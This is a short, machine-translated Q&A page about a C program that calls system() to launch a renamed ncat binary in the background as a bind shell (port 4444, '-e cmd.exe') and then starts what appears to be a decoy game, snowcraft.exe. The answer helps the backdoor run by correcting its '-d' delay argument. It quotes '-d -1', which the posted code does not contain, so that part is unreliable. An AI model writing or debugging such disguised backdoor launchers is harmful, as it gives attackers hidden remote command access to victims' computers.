Ncat:无效-d delay(必须大于0)退出

时间:2017-08-28 12:48:41

标签: c

#include <stdio.h> 
#include <stdlib.h> 
int main() 
{ 
    system("start /B dir\\chest.exe -d -L -p 4444 -e cmd.exe"); 
    system("dir\\snowcraft.exe"); 
}

This is my error any help please ?

1 个答案:

答案 0 :(得分:0)

非常清楚,你必须将值大于0设置为-d参数。

更改

system("... -d -1 ...");
               ^

system("... -d 1 ...");